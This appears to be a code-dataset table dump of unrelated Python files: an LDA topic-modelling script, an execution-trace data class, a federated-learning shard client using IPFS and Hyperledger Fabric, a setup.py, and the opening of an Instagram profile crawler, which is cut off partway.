ext
stringclasses 9
values | sha
stringlengths 40
40
| content
stringlengths 3
1.04M
|
---|---|---|
py | b4158edb8cfa35c2f23a508eaa8354f0b1caa189 | # -*- coding: utf-8 -*-
"""
Created on Wed Feb 27 16:29:00 2019
@author: Yoi
"""
import numpy as np
import lda
import lda.datasets
import jieba
import codecs
from text_parse import TEXT_parse
from cart_text_jieba import CART_text_jieba
class LDA_model():
def __init__(self, topics=2):
self.n_topic = topics
self.corpus = None
self.vocab = None
self.ppCountMatrix = None
self.stop_words = [u',', u'。', u'、', u'(', u')', u'·', u'!', u' ', u':', u'“', u'”', u'\n']
self.model = None
def loadCorpusFromFile(self, fn,stop_words):
# 中文分词
f = open(fn, 'r',encoding = 'utf-8')
text = f.readlines()
text = r' '.join(text)
seg_generator = jieba.cut(text)
seg_list = [i for i in seg_generator if i not in stop_words]
#print(seg_list)
seg_list = r' '.join(seg_list)
# 切割统计所有出现的词纳入词典
seglist = seg_list.split(" ")
self.vocab = []
for word in seglist:
if (word != u' ' and word not in self.vocab):
self.vocab.append(word)
CountMatrix = []
f.seek(0, 0)
# 统计每个文档中出现的词频
for line in f:
# 置零
count = np.zeros(len(self.vocab),dtype=np.int)
text = line.strip()
# 但还是要先分词
seg_generator = jieba.cut(text)
seg_list = [i for i in seg_generator if i not in stop_words]
seg_list = r' '.join(seg_list)
seglist = seg_list.split(" ")
# 查询词典中的词出现的词频
for word in seglist:
if word in self.vocab:
count[self.vocab.index(word)] += 1
CountMatrix.append(count)
f.close()
#self.ppCountMatrix = (len(CountMatrix), len(self.vocab))
self.ppCountMatrix = np.array(CountMatrix)
print("load corpus from %s success!"%fn)
#建立停用词
def setStopWords(self, word_list):
self.stop_words = word_list
#生成模型
def fitModel(self, n_iter = 1500, _alpha = 0.1, _eta = 0.01):
self.model = lda.LDA(n_topics=self.n_topic, n_iter=n_iter, alpha=_alpha, eta= _eta, random_state= 1)
self.model.fit(self.ppCountMatrix)
def printTopic_Word(self, n_top_word = 8):
for i, topic_dist in enumerate(self.model.topic_word_):
topic_words = np.array(self.vocab)[np.argsort(topic_dist)][:-(n_top_word + 1):-1]
print("Topic:" + str(i) + "\n")
for word in topic_words:
if word == "":
continue
print(word + " " + str(topic_dist[i]) + "\n")
print("\n")
# 生成词
def saveVocabulary(self, fn):
f = codecs.open(fn, 'w', 'utf-8')
for word in self.vocab:
f.write("%s\n"%word)
f.close()
#将 主题与词的对应写入 TXT文件
def saveTopic_Words(self, fn, n_top_word = 10):
if n_top_word==-1:
n_top_word = len(self.vocab)
f = codecs.open(fn, 'w', 'utf-8')
for i, topic_dist in enumerate(self.model.topic_word_):
topic_words = np.array(self.vocab)[np.argsort(topic_dist)][:-(n_top_word + 1):-1]
f.write( "Topic:%d\n"%i)
for word in topic_words:
if word == "":
continue
f.write(word + " " + str(topic_dist[i]) + "\n")
f.write("\n")
f.close()
#将 文档所属主题的概率写入TXT文件
def saveDoc_Topic(self, fn):
f = codecs.open(fn, 'w', 'utf-8')
for i in range(len(self.ppCountMatrix)):
f.write("Doc %d:((top topic:%s) topic distribution:%s)\n" % (i, self.model.doc_topic_[i].argmax(), self.model.doc_topic_[i]))
f.close()
#将 文档所属主题的结果写入TXT文件
def saveDoc_Address(self, fn):
f = codecs.open(fn, 'w', 'utf-8')
for i in range(len(self.ppCountMatrix)):
f.write("Doc %d:(top topic:%s)\n" % (i, self.model.doc_topic_[i].argmax()))
f.close()
if __name__=="__main__":
dire="datasource/cartdata"
txt="data/cart_text.txt"
cut_txt = "data/cart_text_cut.txt"
stopword = "data/stopword.txt"
text = TEXT_parse(directory=dire,txt_file=txt)
text.parse()
text_jieba = CART_text_jieba(txt_file=txt,jieba_txt=cut_txt)
text_jieba.jieba()
for i in range(5,20,2):
num_topics = i
_lda = LDA_model(topics=num_topics)
file = open(stopword,encoding="utf-8")
stop_words = [i.replace(u'\n','') for i in file.readlines() if i.startswith(u'\n')==False]
#print(stop_words)
_lda.setStopWords(stop_words)
_lda.loadCorpusFromFile(cut_txt,stop_words)
_lda.fitModel(n_iter=1500)
_lda.printTopic_Word(n_top_word=10)
_lda.saveVocabulary('data/result/vocab_' + str(num_topics) + '.txt')
_lda.saveTopic_Words('data/result/topic_word_' + str(num_topics) + '.txt')
_lda.saveDoc_Topic('data/result/doc_topic_' + str(num_topics) + '.txt')
_lda.saveDoc_Address('data/result/doc_address_' + str(num_topics) + '.txt')
'''
ss="长话短说\n就哈哈哈哈"
print(ss.replace(u'\n',''))
print(ss.startswith(u'\n')==False)
stop_words=["长话短说\n","长话短说\n","长话短说\n","长话短说\n","长话短说\n","我\n","在\n",]
seg_generator=jieba.cut("我在做的重庆口味的水煮鱼,老家的重庆渝香辣婆婆水煮鱼都是改良过的")
seg_list = [i for i in seg_generator if i not in stop_words]
print(seg_list)
'''
|
py | b41591a64539262b71267bdbfa6161b9185e4af7 | from operator import attrgetter
class TraceData:
"""TraceData class.
Class for storing execution traces and bookmarks.
Attributes:
filename (str): A trace file name.
arch (str): CPU architecture.
ip_name (str): Instruction pointer name
regs (dict): Register names and indexes
trace (list): A list of traced instructions, registers and memory accesses.
bookmarks (list): A list of bookmarks.
"""
def __init__(self):
"""Inits TraceData."""
self.filename = ""
self.arch = ""
self.ip_name = ""
self.regs = {}
self.trace = []
self.bookmarks = []
def clear(self):
"""Clears trace and all data"""
self.trace = []
self.bookmarks = []
def get_trace(self):
"""Returns a full trace
Returns:
list: Trace
"""
return self.trace
def get_reg_index(self, reg_name):
"""Returns a register index
Args:
reg_name (str): Register name
Returns:
int: Register index
"""
try:
index = self.regs[reg_name]
except KeyError:
print('Unknown register')
return index
def get_modified_regs(self, row):
"""Returns modfied regs
Args:
row (int): Trace row index
Returns:
list: List of register names
"""
modfied_regs = []
reg_values = self.trace[row]["regs"]
next_row = row + 1
if next_row < len(self.trace):
for reg_name, reg_index in self.regs.items():
reg_value = reg_values[reg_index]
next_row_data = self.trace[next_row]
next_reg_value = next_row_data["regs"][reg_index]
if next_reg_value != reg_value:
modfied_regs.append(reg_name)
return modfied_regs
def get_trace_rows(self, rows):
"""Returns a trace of specified rows
Args:
rows (list): List of trace indexes
Returns:
list: Trace
"""
trace = []
try:
for index in rows:
trace.append(self.trace[int(index)])
except IndexError:
print("Error. Could not get trace rows.")
return trace
def get_instruction_pointer_name(self):
"""Returns an instruction pointer name
Returns:
str: Instruction pointer name
"""
if self.ip_name:
return self.ip_name
ip_name = ""
try:
if "eip" in self.regs:
ip_name = "eip"
elif "rip" in self.regs:
ip_name = "rip"
elif "ip" in self.regs:
ip_name = "ip"
except IndexError:
print("Error. Could not get IP name")
return ip_name
def get_instruction_pointer(self, row):
"""Returns a value of instruction pointer of specified row
Args:
row: Trace index
Returns:
int: Address of instruction
"""
ip = 0
try:
ip_name = self.get_instruction_pointer_name()
reg_index = self.regs[ip_name]
ip = self.trace[row]["regs"][reg_index]
# if ip_name in regs:
# ip = regs[ip_name]
except IndexError:
print("Error. Could not get IP from row " + str(row))
return ip
def set_comment(self, comment, row):
"""Adds a comment to trace
Args:
comment (str): Comment text
row (int): Trace index
"""
try:
self.trace[row]["comment"] = str(comment)
except IndexError:
print("Error. Could not set comment to row " + str(row))
def add_bookmark(self, new_bookmark, replace=False):
"""Adds a new bookmark
Args:
new_bookmark (Bookmark): A new bookmark
replace (bool): Replace an existing bookmark if found on same row?
Defaults to False.
"""
for i, bookmark in enumerate(self.bookmarks):
if self.bookmarks[i].startrow == new_bookmark.startrow:
if replace:
self.bookmarks[i] = new_bookmark
print("Bookmark at %s replaced." % bookmark.startrow)
else:
print("Error: bookmark at %s already exists." % bookmark.startrow)
return
self.bookmarks.append(new_bookmark)
self.sort_bookmarks()
def delete_bookmark(self, index):
"""Deletes a bookmark
Args:
index (int): Index on bookmark list
Returns:
bool: True if bookmark deleted, False otherwise
"""
try:
del self.bookmarks[index]
except IndexError:
print("Error. Could not delete a bookmark " + str(index))
return False
return True
def sort_bookmarks(self):
"""Sorts bookmarks by startrow"""
self.bookmarks.sort(key=attrgetter("startrow"))
def get_bookmark_from_row(self, row):
"""Returns a bookmark for a given trace row.
Args:
row (int): Trace row index
Returns:
Bookmark: Returns A Bookmark if found, None otherwise.
"""
for bookmark in self.bookmarks:
if bookmark.startrow <= row <= bookmark.endrow:
return bookmark
return None
def get_bookmarks(self):
"""Returns all bookmarks
Returns:
list: List of bookmarks
"""
return self.bookmarks
def set_bookmarks(self, bookmarks):
"""Sets bookmarks
Args:
bookmarks (list): Bookmarks
"""
self.bookmarks = bookmarks
def clear_bookmarks(self):
"""Clears bookmarks"""
self.bookmarks = []
|
py | b415923cd10c41e85bf97f4e45130c3237df29ca | # -*- coding: utf-8 -*-
# ******************************************************
# Filename : clientRun.py
# Author : Shuo Yuan
# Email : [email protected]
# Blog : https://iyuanshuo.com
# Last modified: 2020-06-18 21:10
# Description :
# ******************************************************
import sys
from dagComps import transaction
import socket
import os
from dagSocket import dagClient
from torch.utils.tensorboard import SummaryWriter
import time
import threading
import shutil
import json
import random
import subprocess
import pickle
import pandas as pd
# Common Components
sys.path.append('../commonComponent')
import usefulTools
## FL related
import matplotlib
matplotlib.use('Agg')
import matplotlib.pyplot as plt
import copy
import numpy as np
from torchvision import datasets, transforms
import torch
sys.path.append('../federatedLearning')
from utils.sampling import mnist_iid, mnist_noniid, cifar_iid
from utils.options import args_parser
from models.Update import LocalUpdate
from models.Nets import MLP, CNNMnist, CNNCifar
from models.Fed import FedAvg
from models.test import test_img
import buildModels
import datetime
# Number of tips selected by the leader of shard blockchain
alpha = 3
# Number of tips needs to be kept greater than 3
beta = 3
# Number of tips confirmed by the new transaction
gamma = 2
# Index of shard network
nodeNum = 1
# Rounds trained in shard
# shard_round = 4
# shell envs of Org1
fabricLocation = "export FabricL=/home/shawn/Documents/fabric-samples/test-network"
shellEnv1 = "export PATH=${FabricL}/../bin:$PATH"
shellEnv2 = "export FABRIC_CFG_PATH=${FabricL}/../config/"
shellEnv3 = "export CORE_PEER_TLS_ENABLED=true"
shellEnv4 = "export CORE_PEER_LOCALMSPID=\"Org1MSP\""
shellEnv5 = "export CORE_PEER_TLS_ROOTCERT_FILE=${FabricL}/organizations/peerOrganizations/org1.example.com/peers/peer0.org1.example.com/tls/ca.crt"
shellEnv6 = "export CORE_PEER_MSPCONFIGPATH=${FabricL}/organizations/peerOrganizations/org1.example.com/users/[email protected]/msp"
shellEnv7 = "export CORE_PEER_ADDRESS=localhost:7051"
oneKeyEnv = shellEnv1 + " && " + shellEnv2 + " && " + shellEnv3 + " && " + shellEnv4 + " && " + shellEnv5 + " && " + shellEnv6 + " && " + shellEnv7
# Acc and Loss of the model trained by shard
nodeTestAcc = []
nodeTestLoss = []
# Acc and Loss on training set
nodeTrainAcc = []
nodeTrainLoss = []
def main(aim_addr='149.129.40.183'):
if os.path.exists('./clientS'):
shutil.rmtree('./clientS')
os.mkdir('./clientS')
if os.path.exists('./clientS/paras'):
shutil.rmtree('./clientS/paras')
os.mkdir('./clientS/paras')
if os.path.exists('./clientS/paras/apvTrans'):
shutil.rmtree('./clientS/paras/apvTrans')
os.mkdir('./clientS/paras/apvTrans')
if os.path.exists('./clientS/paras/local'):
shutil.rmtree('./clientS/paras/local')
os.mkdir('./clientS/paras/local')
if os.path.exists('./clientS/tipsJson'):
shutil.rmtree('./clientS/tipsJson')
os.mkdir('./clientS/tipsJson')
if os.path.exists('./clientS/apvJson'):
shutil.rmtree('./clientS/apvJson')
os.mkdir('./clientS/apvJson')
# build model
net_glob, args, dataset_train, dataset_test, dict_users = buildModels.modelBuild()
net_glob.train()
## copy weights
w_glob = net_glob.state_dict()
iteration_count = 0
# selected device
## init the list of device name
allDeviceName = []
for i in range(args.num_users):
allDeviceName.append("device"+("{:0>5d}".format(i)))
deviceSelected = []
# Randomly select the devices
# m = max(int(args.frac * args.num_users), 1) # args.frac is the fraction of users
# idxs_users = np.random.choice(range(args.num_users), m, replace=False)
# print('\n**************************** Idxs of selected devices *****************************')
# print('The idxs of selected devices are\n', idxs_users)
# print('*************************************************************************************\n')
# ## Exchange the info of selected device with fabric
# with open('../commonComponent/selectedDeviceIdxs.txt', 'wb') as f:
# pickle.dump(idxs_users, f)
idxs_users = [ 5, 56, 76, 78, 68, 25, 47, 15, 61, 55]
# idxs_users = [60, 37, 27, 70, 79, 34, 18, 88, 57, 98]
# idxs_users = [48, 46, 33, 82, 4, 7, 6, 91, 92, 52]
dateNow = datetime.datetime.now().strftime('%Y%m%d%H%M%S')
basic_acc_list = []
## tensorboard Part
# writer = SummaryWriter()
# writer.add_scalars('Acc', {'Acc_with_Check': 0}, 0)
# tenfig_data = []
# writer.add_scalars('Acc', {'Acc_without_Check': 0}, 0)
# AWOC_fileName = '/root/shard3/data/shard_3_round3_tenfig_data_cnn_20200821135421.csv'
# acc_wo_check_csv = pd.read_csv(AWOC_fileName)
# acc_wo_check_data = np.array(acc_wo_check_csv['shard_3'])
# writer.add_scalars('Loss', {'Loss_with_Check': 1}, 0)
# tenfig_data_loss = []
# writer.add_scalars('Loss', {'Loss_without_Check': 1}, 0)
# LWOC_fileName = '/root/shard3/data/shard_3_round3_tenfig_data_loss_cnn_20200821135421.csv'
# loss_wo_check_csv = pd.read_csv(LWOC_fileName)
# loss_wo_check_data = np.array(loss_wo_check_csv['shard_3'])[1:]
# tensor_iter = 1
## tensorboard part
## Exchange the info of selected device with fabric: dict_user_fileHash:QmTuvPRDGnLm95fL7uxxhvegoWL3Q9YyAUtEsTK5ZetN4W
dict_users_file = "../commonComponent/dict_users.pkl"
dict_userf_fileHash = "QmTuvPRDGnLm95fL7uxxhvegoWL3Q9YyAUtEsTK5ZetN4W"
while 1:
dictUserGetStatus, dictUsersttCodeGet = usefulTools.ipfsGetFile(dict_userf_fileHash, dict_users_file)
print('The filehash of this dict_user is ' + dict_userf_fileHash + ' , and the file is ' + dict_users_file + '!')
if dictUsersttCodeGet == 0:
print(dictUserGetStatus.strip())
print('The dict_user file ' + dict_users_file + ' has been downloaded!\n')
break
else:
print(dictUserGetStatus)
print('\nFailed to download the dict_user file ' + dict_users_file + ' !\n')
with open(dict_users_file, 'rb') as f:
dict_users = pickle.load(f)
for idx in idxs_users:
deviceSelected.append(allDeviceName[idx])
print('\n**************************** Selected devices *****************************')
print('The idxs of selected devices are\n', deviceSelected)
print('*****************************************************************************\n')
while 1:
print('\n\n\n**************************** Iteration %d *****************************'%iteration_count)
# init the task ID
taskID = 'task'+str(random.randint(1,10))+str(random.randint(1,10))+str(random.randint(1,10))+str(random.randint(1,10))
# Choose and require the apv trans
apv_trans_cands = []
if iteration_count == 0:
apv_trans_cands.append('GenesisBlock')
else:
tips_list = 'tip_list'
tips_file = './clientS/tipsJson/iteration-' + str(iteration_count) + '-' + tips_list + '.json'
dagClient.client_tips_require(aim_addr, tips_list, tips_file)
## try to fix the JSONDecodeError
try:
with open(tips_file, encoding='utf-8-sig', errors='ignore', mode='r') as f1:
tips_dict = json.load(f1)
f1.close()
except:
time.sleep(2)
dagClient.client_tips_require(aim_addr, tips_list, tips_file)
with open(tips_file, encoding='utf-8-sig', errors='ignore', mode='r') as f1:
tips_dict = json.load(f1)
f1.close()
if len(tips_dict) <= alpha:
apv_trans_cands = list(tips_dict.keys())
else:
apv_trans_cands = random.sample(tips_dict.keys(), alpha)
print('\n************************* Select Candidates Tips *****************************')
print('The candidates tips are ', apv_trans_cands)
print('********************************************************************************\n')
# Get the trans file and the model paras file
apv_trans_cands_dict = {}
for apvTrans in apv_trans_cands:
apvTransFile = './clientS/apvJson/' + apvTrans + '.json'
dagClient.client_trans_require(aim_addr, apvTrans, apvTransFile)
print('\nThis approved trans is ', apvTrans, ', and the file is ', apvTransFile)
apvTransInfo = transaction.read_transaction(apvTransFile)
apvParasFile = './clientS/paras/apvTrans/iteration-' + str(iteration_count) + '-' + apvTrans + '.pkl'
while 1:
fileGetStatus, sttCodeGet = usefulTools.ipfsGetFile(apvTransInfo.model_para, apvParasFile)
print('The filehash of this approved trans is ' + apvTransInfo.model_para + ', and the file is ' + apvParasFile + '!')
if sttCodeGet == 0:
print(fileGetStatus.strip())
print('The apv parasfile ' + apvParasFile + ' has been downloaded!\n')
break
else:
print(fileGetStatus)
print('\nFailed to download the apv parasfile ' + apvParasFile + ' !\n')
apv_trans_cands_dict[apvTransInfo.name] = float(apvTransInfo.model_acc)
# select tips for aggregation of basic model !!! key function
apv_trans_final = []
if len(apv_trans_cands_dict) == alpha:
sort_dict = sorted(apv_trans_cands_dict.items(),key=lambda x:x[1],reverse=True)
for i in range(gamma):
apv_trans_final.append(sort_dict[i][0])
else:
apv_trans_final = apv_trans_cands
# load the apv paras
w_apv = []
for item in apv_trans_final:
apvParasFile = './clientS/paras/apvTrans/iteration-' + str(iteration_count) + '-' + item + '.pkl'
net_glob.load_state_dict(torch.load(apvParasFile, map_location=torch.device('cpu')))
w_tmp = net_glob.state_dict()
w_apv.append(copy.deepcopy(w_tmp))
if len(w_apv) == 1:
w_glob = w_apv[0]
else:
w_glob = FedAvg(w_apv)
baseParasFile = './clientS/paras/baseModelParas-iter'+str(iteration_count)+'.pkl'
torch.save(w_glob, baseParasFile)
# evalute the acc of basic model obtain from DAG
basicModelAcc, basicModelLoss = buildModels.evalua(net_glob, w_glob, dataset_test, args)
basicModelAcc = basicModelAcc.cpu().numpy().tolist()
print("\n************************************")
print("Acc of the basic model in iteration "+str(iteration_count)+" is "+str(basicModelAcc))
print("************************************")
basic_acc_list.append(basicModelAcc)
basicAccDf = pd.DataFrame({'shard_{}'.format(nodeNum):basic_acc_list})
basicAccDf.to_csv("../data/shard_{}_round{}_basic_acc_{}_{}.csv".format(nodeNum, args.epochs, args.model, dateNow),index=False,sep=',')
# Add the paras file of base model to ipfs network for shard training
while 1:
basefileHash, baseSttCode = usefulTools.ipfsAddFile(baseParasFile)
if baseSttCode == 0:
print('\nThe base mode parasfile ' + baseParasFile + ' has been uploaded!')
print('And the fileHash is ' + basefileHash + '\n')
break
else:
print('Error: ' + basefileHash)
print('\nFailed to uploaded the aggregated parasfile ' + baseParasFile + ' !\n')
# Task release & model aggregation
## Task release
taskEpochs = args.epochs
taskInitStatus = "start"
taskUsersFrac = args.frac
while 1:
taskRelease = subprocess.Popen(args=['../commonComponent/interRun.sh release '+taskID+' '+str(taskEpochs)+' '+taskInitStatus+' '+str(taskUsersFrac)], shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, encoding='utf-8')
trOuts, trErrs = taskRelease.communicate(timeout=10)
if taskRelease.poll() == 0:
print('*** ' + taskID + ' has been released! ***')
print('*** And the detail of this task is ' + trOuts.strip() + '! ***\n')
break
else:
print(trErrs)
print('*** Failed to release ' + taskID + ' ! ***\n')
time.sleep(2)
## Publish the init base model
### taskEpoch template {"Args":["set","taskID","{"epoch":1,"status":"training","paras":"fileHash"}"]}
while 1:
spcAggModelPublish = subprocess.Popen(args=['../commonComponent/interRun.sh aggregated '+taskID+' 0 training '+basefileHash], shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, encoding='utf-8')
aggPubOuts, aggPubErrs = spcAggModelPublish.communicate(timeout=10)
if spcAggModelPublish.poll() == 0:
print('*** The init aggModel of ' + taskID + ' has been published! ***')
print('*** And the detail of the init aggModel is ' + aggPubOuts.strip() + ' ! ***\n')
break
else:
print(aggPubErrs)
print('*** Failed to publish the init aggModel of ' + taskID + ' ! ***\n')
## wait the local train
time.sleep(10)
## Aggregated the local model trained by the selected devices
currentEpoch = 1
aggEchoFileHash = ''
aggModelAcc = 50.0
while (currentEpoch <= args.epochs):
flagList = set(copy.deepcopy(deviceSelected))
w_locals = []
while (len(flagList) != 0):
flagSet = set()
ts = []
lock = threading.Lock()
for deviceID in flagList:
localFileName = './clientS/paras/local/' + taskID + '-' + deviceID + '-epoch-' + str(currentEpoch) + '.pkl'
t = threading.Thread(target=usefulTools.queryLocal,args=(lock,taskID,deviceID,currentEpoch,flagSet,localFileName,))
t.start()
ts.append(t)
for t in ts:
t.join()
time.sleep(2)
flagList = flagList - flagSet
for deviceID in deviceSelected:
localFileName = './clientS/paras/local/' + taskID + '-' + deviceID + '-epoch-' + str(currentEpoch) + '.pkl'
## no check
# net_glob.load_state_dict(torch.load(localFileName))
# tmpParas = net_glob.state_dict()
# w_locals.append(copy.deepcopy(tmpParas))
## check the acc of the models trained by selected device & drop the low quality model
canddts_dev_pas = torch.load(localFileName,map_location=torch.device('cpu'))
acc_canddts_dev, loss_canddts_dev = buildModels.evalua(net_glob, canddts_dev_pas, dataset_test, args)
acc_canddts_dev = acc_canddts_dev.cpu().numpy().tolist()
print("Test acc of the model trained by "+str(deviceID)+" is " + str(acc_canddts_dev))
if (acc_canddts_dev - aggModelAcc) < -10:
print(str(deviceID)+" is a malicious device!")
else:
w_locals.append(copy.deepcopy(canddts_dev_pas))
w_glob = FedAvg(w_locals)
aggEchoParasFile = './clientS/paras/aggModel-iter-'+str(iteration_count)+'-epoch-'+str(currentEpoch)+'.pkl'
torch.save(w_glob, aggEchoParasFile)
# evalute the acc of datatest
aggModelAcc, aggModelLoss = buildModels.evalua(net_glob, w_glob, dataset_test, args)
aggModelAcc = aggModelAcc.cpu().numpy().tolist()
# save the acc and loss
nodeTestAcc.append(aggModelAcc)
nodeTestLoss.append(aggModelLoss)
nodeTestAccDf = pd.DataFrame({'shard_{}'.format(nodeNum):nodeTestAcc})
nodeTestAccDf.to_csv("../data/result/shard_{}_round{}_test_acc_{}_{}.csv".format(nodeNum, args.epochs, args.model, dateNow),index=False,sep=',')
nodeTestLossDf = pd.DataFrame({'shard_{}'.format(nodeNum):nodeTestLoss})
nodeTestLossDf.to_csv("../data/result/shard_{}_round{}_test_loss_{}_{}.csv".format(nodeNum, args.epochs, args.model, dateNow),index=False,sep=',')
# evalute the acc on training set
aggModelTrainAcc, aggModelTrainLoss = buildModels.evalua(net_glob, w_glob, dataset_train, args)
aggModelTrainAcc = (aggModelTrainAcc.cpu().numpy().tolist())/100
# save the acc and loss on training set
nodeTrainAcc.append(aggModelTrainAcc)
nodeTrainLoss.append(aggModelTrainLoss)
nodeTrainAccDf = pd.DataFrame({'shard_{}'.format(nodeNum):nodeTrainAcc})
nodeTrainAccDf.to_csv("../data/result/shard_{}_round{}_train_acc_{}_{}.csv".format(nodeNum, args.epochs, args.model, dateNow),index=False,sep=',')
nodeTrainLossDf = pd.DataFrame({'shard_{}'.format(nodeNum):nodeTrainLoss})
nodeTrainLossDf.to_csv("../data/result/shard_{}_round{}_train_loss_{}_{}.csv".format(nodeNum, args.epochs, args.model, dateNow),index=False,sep=',')
# add the tensorboard view
# writer.add_scalars('Acc', {'Acc_with_Check': aggModelAcc/100}, tensor_iter)
# writer.add_scalars('Acc', {'Acc_without_Check': acc_wo_check_data[tensor_iter-1]}, tensor_iter)
# tenfig_data.append(aggModelAcc/100)
# tenfig_data_df = pd.DataFrame({'shard_{}'.format(nodeNum):tenfig_data})
# tenfig_data_df.to_csv("../data/shard_{}_round{}_tenfig_data_{}_{}.csv".format(nodeNum, args.epochs, args.model, dateNow),index=False,sep=',')
# writer.add_scalars('Loss', {'Loss_with_Check': aggModelLoss}, tensor_iter)
# writer.add_scalars('Loss', {'Loss_without_Check': loss_wo_check_data[tensor_iter-1]}, tensor_iter)
# tenfig_data_loss.append(aggModelLoss)
# tenfig_data_loss_df = pd.DataFrame({'shard_{}'.format(nodeNum):tenfig_data_loss})
# tenfig_data_loss_df.to_csv("../data/shard_{}_round{}_tenfig_data_loss_{}_{}.csv".format(nodeNum, args.epochs, args.model, dateNow),index=False,sep=',')
# tensor_iter += 1
print("\n************************************")
print("Acc of the agg model of Round "+str(currentEpoch)+" in iteration "+str(iteration_count)+" is "+str(aggModelAcc))
print("************************************")
# aggEchoParasFile is the paras of this sharding trained in current epoch
# Add the aggregated paras file to ipfs network
while 1:
aggEchoFileHash, sttCodeAdd = usefulTools.ipfsAddFile(aggEchoParasFile)
if sttCodeAdd == 0:
print('\n*************************')
print('The aggregated parasfile ' + aggEchoParasFile + ' has been uploaded!')
print('And the fileHash is ' + aggEchoFileHash + '!')
print('*************************\n')
break
else:
print('Error: ' + aggEchoFileHash)
print('\nFailed to uploaded the aggregated parasfile ' + aggEchoParasFile + ' !\n')
## Publish the aggregated model paras trained in this epoch
### taskEpoch template {"Args":["set","taskID","{"epoch":1,"status":"training","paras":"fileHash"}"]}
taskStatus = 'training'
if currentEpoch == args.epochs:
taskStatus = 'done'
while 1:
epochAggModelPublish = subprocess.Popen(args=['../commonComponent/interRun.sh aggregated '+taskID+' '+str(currentEpoch)+' '+taskStatus+' '+aggEchoFileHash], shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, encoding='utf-8')
aggPubOuts, aggPubErrs = epochAggModelPublish.communicate(timeout=10)
if epochAggModelPublish.poll() == 0:
print('\n******************')
print('The info of task ' + taskID + ' is ' + aggPubOuts.strip())
print('The model aggregated in epoch ' + str(currentEpoch) + ' for ' + taskID + ' has been published!')
print('******************\n')
break
else:
print(aggPubErrs)
print('*** Failed to publish the Model aggregated in epoch ' + str(currentEpoch) + ' for ' + taskID + ' ! ***\n')
currentEpoch += 1
new_trans = transaction.Transaction(time.time(), nodeNum, aggModelAcc, aggEchoFileHash, apv_trans_final)
# upload the trans to DAG network
dagClient.trans_upload(aim_addr, new_trans)
print('\n******************************* Transaction upload *******************************')
print('The details of this trans are', new_trans)
print('The trans generated in the iteration #%d had been uploaded!'%iteration_count)
print('*************************************************************************************\n')
iteration_count += 1
time.sleep(2)
writer.close()
if __name__ == '__main__':
main('192.168.2.12') |
py | b415935f0f619ec55cdd463f9ca003497e7dd417 | name = 'usain'
message = "Hello " + name.title() + ", are you faster than lightning?"
print (message) |
py | b415940e861896b14f5899baeb24e71b9c80e8c0 | # from .dualpath import DualData, DualData25, DualData28
from .singlepath import SingleData, SingleData25, SingleData28
|
py | b415951b4b54305a92bf3c4147edd260a17b5b52 | class SerialConnection(object):
def __init__(self):
raise NotImplementedError("This class is a stub") |
py | b415953a21c18d696f7d7f0c5bb996748666bb1f | from setuptools import find_packages, setup
import djangocms_versioning_filer
CLASSIFIERS = [
'Environment :: Web Environment',
'Framework :: Django',
'Intended Audience :: Developers',
'License :: OSI Approved :: BSD License',
'Operating System :: OS Independent',
'Programming Language :: Python',
'Topic :: Internet :: WWW/HTTP :: Dynamic Content',
'Topic :: Software Development',
'Topic :: Software Development :: Libraries :: Application Frameworks',
'Programming Language :: Python :: 3.4',
'Programming Language :: Python :: 3.5',
'Programming Language :: Python :: 3.6',
'Framework :: Django',
'Framework :: Django :: 1.11',
'Framework :: Django :: 2.0',
'Framework :: Django :: 2.1',
]
INSTALL_REQUIREMENTS = [
'Django>=1.11,<2.2',
# 'django-filer', # new version not released
# 'djangocms-versioning', # not released
# 'django-cms>=4.0', # not released
]
setup(
name='djangocms-versioning-filer',
author='Divio AG',
author_email='[email protected]',
url='http://github.com/divio/djangocms-versioning-filer',
license='BSD',
version=djangocms_versioning_filer.__version__,
description=djangocms_versioning_filer.__doc__,
long_description=open('README.rst').read(),
platforms=['OS Independent'],
classifiers=CLASSIFIERS,
install_requires=INSTALL_REQUIREMENTS,
packages=find_packages(),
include_package_data=True,
zip_safe=False,
test_suite='test_settings.run',
)
|
py | b4159579250a88b9e356447214d19ab31a2136e6 | from __future__ import unicode_literals
import glob
import json
import os
import re
import sys
import time
import traceback
from builtins import open
from time import sleep
from tqdm import tqdm
from . import secret
from .browser import Browser
from .exceptions import RetryException
from .fetch import fetch_caption
from .fetch import fetch_comments
from .fetch import fetch_datetime
from .fetch import fetch_details
from .fetch import fetch_imgs
from .fetch import fetch_likers
from .fetch import fetch_likes_plays
from .utils import instagram_int
from .utils import randmized_sleep
from .utils import retry
class Logging(object):
PREFIX = "instagram-crawler"
def __init__(self):
try:
timestamp = int(time.time())
self.cleanup(timestamp)
self.logger = open("/tmp/%s-%s.log" % (Logging.PREFIX, timestamp), "w")
self.log_disable = False
except Exception:
self.log_disable = True
def cleanup(self, timestamp):
days = 86400 * 7
days_ago_log = "/tmp/%s-%s.log" % (Logging.PREFIX, timestamp - days)
for log in glob.glob("/tmp/instagram-crawler-*.log"):
if log < days_ago_log:
os.remove(log)
def log(self, msg):
if self.log_disable:
return
self.logger.write(msg + "\n")
self.logger.flush()
def __del__(self):
if self.log_disable:
return
self.logger.close()
class InsCrawler(Logging):
URL = "https://www.instagram.com"
RETRY_LIMIT = 10
def __init__(self, has_screen=False):
super(InsCrawler, self).__init__()
self.browser = Browser(has_screen)
self.page_height = 0
self.login()
def _dismiss_login_prompt(self):
ele_login = self.browser.find_one(".Ls00D .Szr5J")
if ele_login:
self.browser.js_click(ele_login)
def login(self):
browser = self.browser
url = "%s/accounts/login/" % InsCrawler.URL
browser.get(url)
u_input = browser.find_one('input[name="username"]')
u_input.send_keys(secret.username)
p_input = browser.find_one('input[name="password"]')
p_input.send_keys(secret.password)
login_btn = browser.find_one(".L3NKy")
self.browser.js_click(login_btn)
sleep(5)
@retry()
def check_login():
if browser.find_one('input[name="username"]'):
raise RetryException()
check_login()
def get_user_profile(self, username):
browser = self.browser
url = "%s/%s/" % (InsCrawler.URL, username)
browser.get(url)
name = browser.find_one(".rhpdm")
desc = browser.find_one(".-vDIg span")
photo = browser.find_one("._6q-tv")
statistics = [ele.text for ele in browser.find(".g47SY")]
post_num, follower_num, following_num = statistics
return {
"name": name.text,
"desc": desc.text if desc else None,
"photo_url": photo.get_attribute("src"),
"post_num": post_num,
"follower_num": follower_num,
"following_num": following_num,
}
def get_user_profile_from_script_shared_data(self, username):
browser = self.browser
url = "%s/%s/" % (InsCrawler.URL, username)
browser.get(url)
source = browser.driver.page_source
